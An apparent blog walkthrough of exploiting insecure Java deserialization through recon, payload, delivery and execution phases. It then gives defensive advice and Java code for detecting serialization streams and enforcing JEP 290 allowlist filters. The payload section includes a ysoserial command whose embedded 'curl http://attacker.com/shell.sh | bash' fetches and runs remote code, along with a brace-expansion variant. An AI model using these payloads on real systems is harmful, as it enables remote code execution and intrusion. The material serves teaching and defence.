Exploiting Insecure Deserialization in Java Web App.
- Trung Le

- Jul 26
- 1 min read
Phase 1 – Reconnaissance
🔴 Attacker identifies a Java-based application that accepts serialized Java objects, typically in cookies, hidden form fields, or POST bodies. A raw stream is recognizable by its four-byte header AC ED 00 05; when the same stream is base64-encoded (the usual form in cookies) it starts with the prefix rO0AB.
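The following inspector is an added example, not code from the original post. It does the reconnaissance step offline: it decodes a cookie value, checks for the serialization header, and lists the class names the stream declares without ever calling readObject(), so it is safe to run on hostile input. The sample cookie is constructed inside main() by serializing a java.util.ArrayList, and the gadget-package prefix list is an assumption covering only the Commons Collections chains the post mentions.

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Base64;
import java.util.List;

/** Heuristic inspector for Java serialization streams found in cookies or request bodies. */
public class SerialStreamInspector {
    // Every Java serialization stream begins with STREAM_MAGIC (0xACED) and STREAM_VERSION (0x0005).
    private static final byte[] MAGIC = {(byte) 0xAC, (byte) 0xED, 0x00, 0x05};
    // Type code that precedes each new class descriptor in the stream.
    private static final byte TC_CLASSDESC = 0x72;
    // Assumed watchlist: packages of the library the CommonsCollections* gadget chains live in.
    private static final String[] GADGET_PREFIXES = {
        "org.apache.commons.collections.functors.",
        "org.apache.commons.collections4.functors.",
    };

    /** Accepts either the raw bytes (as a Latin-1 string) or the base64 form used in cookies. */
    static byte[] decode(String value) {
        if (value.startsWith("rO0AB")) {            // base64 of AC ED 00 05
            return Base64.getDecoder().decode(value);
        }
        return value.getBytes(StandardCharsets.ISO_8859_1);
    }

    static boolean isJavaSerialized(byte[] b) {
        if (b.length < MAGIC.length) return false;
        for (int i = 0; i < MAGIC.length; i++) {
            if (b[i] != MAGIC[i]) return false;
        }
        return true;
    }

    /** Lists class names without deserializing: scans for TC_CLASSDESC followed by a length-prefixed UTF name. */
    static List<String> classNames(byte[] b) {
        List<String> names = new ArrayList<>();
        for (int i = 0; i + 3 < b.length; i++) {
            if (b[i] != TC_CLASSDESC) continue;
            int len = ((b[i + 1] & 0xFF) << 8) | (b[i + 2] & 0xFF);
            if (len == 0 || len > 256 || i + 3 + len > b.length) continue;
            String name = new String(b, i + 3, len, StandardCharsets.UTF_8);
            // Only keep byte runs that look like a class or array descriptor name; rejects false hits on 0x72.
            if (name.matches("[\\[A-Za-z_$][A-Za-z0-9_$.;\\[]*")) names.add(name);
        }
        return names;
    }

    /** Names from the stream that fall under a known gadget-library package. */
    static List<String> gadgetClasses(byte[] b) {
        List<String> hits = new ArrayList<>();
        for (String n : classNames(b)) {
            for (String p : GADGET_PREFIXES) {
                if (n.startsWith(p)) hits.add(n);
            }
        }
        return hits;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample: serialize an ArrayList so the demo runs offline without any gadget library.
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(new ArrayList<>(Arrays.asList("session-token")));
        }
        String cookie = Base64.getEncoder().encodeToString(bos.toByteArray());
        byte[] stream = decode(cookie);
        System.out.println("cookie prefix:   " + cookie.substring(0, 5));      // rO0AB
        System.out.println("java serialized: " + isJavaSerialized(stream));   // true
        System.out.println("classes named:   " + classNames(stream));         // [java.util.ArrayList]
        System.out.println("gadget classes:  " + gadgetClasses(stream));      // [] on this sample
    }
}
```

The scan is deliberately a heuristic rather than a full stream parser: it is enough to confirm the format and to see which classes a captured payload names (a real ysoserial payload would list the InvokerTransformer and related functors), which is the same signal a WAF or log pipeline can key on.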
Exploit Payload
🔴 Uses a crafted payload generated via ysoserial (the CommonsCollections5 chain needs Apache Commons Collections 3.x on the target's classpath):
java -jar ysoserial.jar CommonsCollections5 'curl http://attacker.com/shell.sh | bash' > payload.ser
🔴 Caveat: the chain ends in Runtime.exec(String), which splits the command on whitespace and does not invoke a shell, so the pipe above would be handed to curl as a literal argument. In practice the command is wrapped so that bash does the parsing, e.g. `bash -c {curl,http://attacker.com/shell.sh}|{bash,-i}` style brace expansion or a base64-decoded one-liner.
Phase 2 – Delivery
🔴 Sends the payload to the vulnerable endpoint.
POST /login HTTP/1.1
Content-Type: application/x-java-serialized-object
Phase 3 – Execution
🔴 The server calls ObjectInputStream.readObject() on the request bytes. The gadget chain runs while the object graph is being reconstructed, before any application code (or cast) sees the result, and ends in Runtime.exec() with the embedded command.
Impact:
🔴 Remote command execution
🔴 Possible reverse shell or malware installation
Weaknesses Exploited
🔴 ObjectInputStream.readObject() called on attacker-controlled bytes, with a gadget-bearing library (Apache Commons Collections 3.x) on the classpath
🔴 No deserialization filter (JEP 290 ObjectInputFilter) or look-ahead class allowlist, so the stream may name and instantiate any serializable class on the classpath
Defensive Recommendations
🔴 Never deserialize untrusted data; prefer data-only formats (JSON with a strict schema) for cookies and request bodies
🔴 Where native serialization must stay, enforce a class allowlist: a JEP 290 ObjectInputFilter (Java 9+, per stream or JVM-wide via -Djdk.serialFilter=) or, on Java 8, look-ahead deserialization in an ObjectInputStream subclass that rejects unexpected classes in resolveClass()
🔴 Do not rely on validating the deserialized object's fields: gadget chains execute inside readObject(), before application code sees the result, so the check must restrict which classes the stream may name, not the values it carries. Also upgrade or remove gadget libraries (Commons Collections 3.2.2+ disables deserialization of InvokerTransformer by default)
🔴 Log and alert on filter rejections, on serialization markers (AC ED 00 05 / rO0AB) arriving in cookies or bodies where none are expected, and on gadget-library class names such as InvokerTransformer in captured streams
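The code below is an added example (not from the original post) showing the three recommendations above side by side: the vulnerable readObject() call, a JEP 290 allowlist filter with rejection logging for detection, and a Java 8 style look-ahead ObjectInputStream. LoginToken is a constructed stand-in for whatever DTO the application keeps in its cookie, and a serialized HashMap stands in for a gadget payload so the program runs without Commons Collections on the classpath; the filter rejects it for the same reason it would reject a real chain, because its class is not on the allowlist. Requires Java 9+ for ObjectInputFilter.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.Serializable;
import java.util.HashMap;

/** Constructed DTO standing in for whatever the application stores in its session cookie (assumption). */
class LoginToken implements Serializable {
    private static final long serialVersionUID = 1L;
    final String username;
    final long expiresAt;
    LoginToken(String username, long expiresAt) { this.username = username; this.expiresAt = expiresAt; }
}

public class TokenDeserialization {

    /** VULNERABLE: every class the bytes name is loaded and its readObject()/readResolve() run before the cast. */
    static LoginToken readUnfiltered(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            return (LoginToken) in.readObject();   // the cast runs only after the whole graph was rebuilt
        }
    }

    /** HARDENED (Java 9+): JEP 290 allowlist. Only LoginToken may appear; limits cap depth and stream size. */
    static final ObjectInputFilter TOKEN_FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=3;maxbytes=4096;" + LoginToken.class.getName() + ";!*");

    /** Wraps the allowlist so every rejection is logged: this is the detection signal for attack attempts. */
    static final ObjectInputFilter LOGGING_FILTER = info -> {
        ObjectInputFilter.Status status = TOKEN_FILTER.checkInput(info);
        if (status == ObjectInputFilter.Status.REJECTED) {
            System.err.println("ALERT deserialization rejected: class=" + info.serialClass()
                    + " depth=" + info.depth() + " bytes=" + info.streamBytes());
        }
        return status;
    };

    static LoginToken readFiltered(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            in.setObjectInputFilter(LOGGING_FILTER);   // must be installed before readObject()
            return (LoginToken) in.readObject();
        }
    }

    /** HARDENED (Java 8, pre-JEP 290): look-ahead deserialization, rejecting when the descriptor is read. */
    static final class LookAheadObjectInputStream extends ObjectInputStream {
        LookAheadObjectInputStream(InputStream in) throws IOException { super(in); }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
            if (!LoginToken.class.getName().equals(desc.getName())) {
                throw new InvalidClassException(desc.getName(), "class not on the deserialization allowlist");
            }
            return super.resolveClass(desc);
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) { out.writeObject(o); }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        byte[] good = serialize(new LoginToken("alice", 1_700_000_000L));
        // Stand-in for a gadget payload: a HashMap is Serializable but is not LoginToken.
        byte[] bad = serialize(new HashMap<String, String>());

        try {
            readUnfiltered(bad);
        } catch (ClassCastException e) {
            System.out.println("unfiltered: HashMap was fully deserialized; the cast failed only afterwards");
        }
        System.out.println("filtered, good token: " + readFiltered(good).username);   // alice
        try {
            readFiltered(bad);
        } catch (InvalidClassException e) {
            System.out.println("filtered, bad stream rejected: " + e.getMessage());
        }
        try (ObjectInputStream in = new LookAheadObjectInputStream(new ByteArrayInputStream(bad))) {
            in.readObject();
        } catch (InvalidClassException e) {
            System.out.println("look-ahead, bad stream rejected: " + e.getMessage());
        }
    }
}
```

The filter pattern names the DTO exactly and ends with `!*`, so any other class descriptor, including every functor a Commons Collections chain needs, is rejected before it is instantiated; primitive and String fields carry no class descriptor and pass. The same allowlist can be applied JVM-wide with `-Djdk.serialFilter=LoginToken;!*` for code paths you do not control.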
[binary payload...]